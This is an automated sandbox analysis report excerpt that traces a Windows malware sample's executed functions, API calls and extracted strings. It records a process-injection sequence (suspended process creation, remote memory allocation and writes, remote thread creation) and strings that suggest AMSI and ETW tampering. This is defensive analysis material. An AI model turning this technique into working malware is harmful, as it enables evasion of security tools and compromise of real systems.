                                                                                                                                          Executed Functions

                                                                                                                                          Function 02AB8128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778processthreadCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 4572 2ab8128-2ab8517 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 4687 2ab851d-2ab86f0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a947ec call 2a949a0 call 2a94d74 call 2a94df0 CreateProcessAsUserW 4572->4687 4688 2ab93a1-2ab9524 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 4572->4688 4795 2ab876e-2ab8879 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 4687->4795 4796 2ab86f2-2ab8769 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 4687->4796 4777 2ab952a-2ab9539 call 2a948ec 4688->4777 4778 2ab9cf5-2abb2fa call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 * 16 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2aa7c10 call 2aa8338 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 ExitProcess 4688->4778 4777->4778 4786 2ab953f-2ab9812 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aaf094 call 2a94860 call 2a949a0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a97e5c 4777->4786 5044 2ab9818-2ab9aea call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae358 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94de0 * 2 call 2a94764 call 2aadc8c 4786->5044 5045 2ab9aef-2ab9cf0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949f8 call 2aa8d70 4786->5045 4897 2ab887b-2ab887e 4795->4897 4898 2ab8880-2ab8ba0 call 2a949f8 call 2aade50 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aad164 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 4795->4898 4796->4795 4897->4898 5215 2ab8bb9-2ab939c call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 ResumeThread call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 CloseHandle call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa8080 call 2aa894c * 6 CloseHandle call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 4898->5215 5216 2ab8ba2-2ab8bb4 call 2aa8730 4898->5216 5044->5045 5045->4778 5215->4688 5216->5215
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,02B1738C,Function_0000662C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,75370000,00000000,00000000), ref: 02AA8AAA
                                                                                                                                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C0B7E0,02C0B824,OpenSession,02B17380,02ABB7B8,UacScan,02B17380), ref: 02AB86E9
                                                                                                                                          • ResumeThread.KERNEL32(00000000,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8), ref: 02AB8D33
                                                                                                                                          • CloseHandle.KERNEL32(00000000,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,00000000,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380), ref: 02AB8EB2
                                                                                                                                            • Part of subcall function 02AA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize,02B173A8,02AAA93C,UacScan), ref: 02AA8960
                                                                                                                                            • Part of subcall function 02AA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02AA897A
                                                                                                                                            • Part of subcall function 02AA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6
                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B17380,02ABB7B8,UacInitialize,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,UacScan,02B17380), ref: 02AB92A4
                                                                                                                                            • Part of subcall function 02A97E5C: GetFileAttributesA.KERNEL32(00000000,?,02AB041F,ScanString,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,UacInitialize), ref: 02A97E67
                                                                                                                                            • Part of subcall function 02AADC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02AADD5E), ref: 02AADCCB
                                                                                                                                            • Part of subcall function 02AADC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02AADD05
                                                                                                                                            • Part of subcall function 02AADC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02AADD32
                                                                                                                                            • Part of subcall function 02AADC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02AADD3B
                                                                                                                                            • Part of subcall function 02AA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02AA83C2), ref: 02AA83A4
                                                                                                                                          • ExitProcess.KERNEL32(00000000,OpenSession,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,Initialize,02B17380,02ABB7B8,00000000,00000000,00000000,ScanString,02B17380,02ABB7B8), ref: 02ABB2FA
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                                          • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                          • API String ID: 2769005614-3738268246
                                                                                                                                          • Opcode ID: 80e4c3ef86f80f9d060256b0fb1d67483fb8f2b4b6915a30b19d7d1519cbc6db
                                                                                                                                          • Instruction ID: 48b674fab93d6b2c5f6a071bac215f76a331cfe086383a9f2c9a804fd713271a
                                                                                                                                          • Opcode Fuzzy Hash: 80e4c3ef86f80f9d060256b0fb1d67483fb8f2b4b6915a30b19d7d1519cbc6db
                                                                                                                                          • Instruction Fuzzy Hash: 6D43F775A8411CDFDF21EB65DE909CA73FABF88304F5044E2A509AB614DE30AE92CF51
                                                                                                                                          Function 02AAB118 Relevance: 50.8, APIs: 6, Strings: 22, Instructions: 1829nativethreadCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 6025 2aab118-2aab11b 6026 2aab120-2aab125 6025->6026 6026->6026 6027 2aab127-2aab7b0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa8594 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 GetModuleHandleW call 2aa8274 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 NtOpenProcess call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a92ee0 call 2a92f08 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 6026->6027 6246 2aacd28-2aacf5e call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa894c * 3 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa894c * 4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 6027->6246 6247 2aab7b6-2aab930 call 2aa7c10 call 2aa7a2c call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 6027->6247 6384 2aacf63-2aacfa0 call 2a94500 * 3 6246->6384 6247->6246 6344 2aab936-2aab966 call 2aa58f4 IsBadReadPtr 6247->6344 6344->6246 6355 2aab96c-2aab971 6344->6355 6355->6246 6357 2aab977-2aab993 IsBadReadPtr 6355->6357 6357->6246 6359 2aab999-2aab9a2 6357->6359 6359->6246 6361 2aab9a8-2aab9cd 6359->6361 6361->6246 6363 2aab9d3-2aabb4c call 2aa7c10 call 2aa7a2c call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 6361->6363 6363->6246 6428 2aabb52-2aabcc8 call 2aa7a2c call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 6363->6428 6428->6246 6473 2aabcce-2aabf3e call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aaafd4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 6428->6473 6546 2aac0dc-2aac23a call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 6473->6546 6547 2aabf44-2aabf45 6473->6547 6632 2aac23c-2aac261 call 2aaaf24 6546->6632 6633 2aac266-2aacb68 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aaafe0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa7d78 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 GetModuleHandleW call 2aa8274 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 NtCreateThreadEx call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 6546->6633 6548 2aabf49-2aac0c0 call 2aaafd4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 6547->6548 6639 2aac0c5-2aac0d6 6548->6639 6632->6633 6909 2aacb6d-2aacd23 call 2aa894c * 5 call 2a94860 call 2a949a0 call 2a947ec call 2a949a0 call 2aa894c call 2a94860 call 2a949a0 call 2a947ec call 2a949a0 call 2aa894c call 2a94860 call 2a949a0 call 2a947ec call 2a949a0 call 2aa894c call 2a94860 call 2a949a0 call 2a947ec call 2a949a0 call 2aa894c call 2aa8080 call 2aa894c * 2 6633->6909 6639->6546 6639->6548 6909->6246
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,02B1738C,Function_0000662C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,75370000,00000000,00000000), ref: 02AA8AAA
                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll,NtOpenProcess,UacScan,02B17380,02AACFC0,ScanString,02B17380,02AACFC0,ScanBuffer,02B17380,02AACFC0,ScanString,02B17380,02AACFC0,UacScan,02B17380), ref: 02AAB3EA
                                                                                                                                            • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                          • NtOpenProcess.NTDLL(02B17584,001F0FFF,02B17318,02B17330), ref: 02AAB4E8
                                                                                                                                            • Part of subcall function 02A92EE0: QueryPerformanceCounter.KERNEL32 ref: 02A92EE4
                                                                                                                                            • Part of subcall function 02AA7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AA7A9F
                                                                                                                                          • IsBadReadPtr.KERNEL32(218F0000,00000040), ref: 02AAB95F
                                                                                                                                          • IsBadReadPtr.KERNEL32(?,000000F8), ref: 02AAB98C
                                                                                                                                            • Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC
                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll,NtCreateThreadEx,UacScan,02B17380,02AACFC0,ScanString,02B17380,02AACFC0,065F0000,065F0000,21940000,1BF4C8EC,02B17588,OpenSession,02B17380,02AACFC0), ref: 02AAC807
                                                                                                                                          • NtCreateThreadEx.NTDLL(02B17560,02000000,02B17318,065F1560,065F1560,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,02B17380,02AACFC0,UacInitialize,02B17380), ref: 02AACA18
                                                                                                                                            • Part of subcall function 02AA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize,02B173A8,02AAA93C,UacScan), ref: 02AA8960
